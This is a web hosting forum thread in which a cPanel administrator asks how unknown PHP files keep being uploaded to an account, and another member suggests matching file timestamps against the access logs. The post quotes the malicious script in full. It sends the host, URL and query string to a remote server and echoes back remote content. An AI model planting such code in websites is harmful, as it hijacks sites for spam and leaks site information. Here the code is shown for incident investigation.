Find out how files were uploaded

::Gomez::

Active Member
Oct 13, 2003
31
3
158
Argentina
cPanel Access Level
Root Administrator
Twitter
Hi, I am dealing with a security issue inside an account. Everyday new files are uploaded to public_html and subfolders, with strange content inside..

for example...

/home/xxx/public_html/rtrfei.php
/home/xxx/public_html/fdbs.php

content is pretty much the same on any of the files...

PHP:
<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://www.example.date/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>

I would like to know if there is any way of finding out how this files were uploaded... (FTP, SCP, SSH, via an script on the server.. etc...)


I think this is the first step to be able to identify the root cause of this issue..

I do have root access to the server.


thanks!
 
Last edited by a moderator:

sparek-3

Well-Known Member
Aug 10, 2002
2,045
230
368
cPanel Access Level
Root Administrator
You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.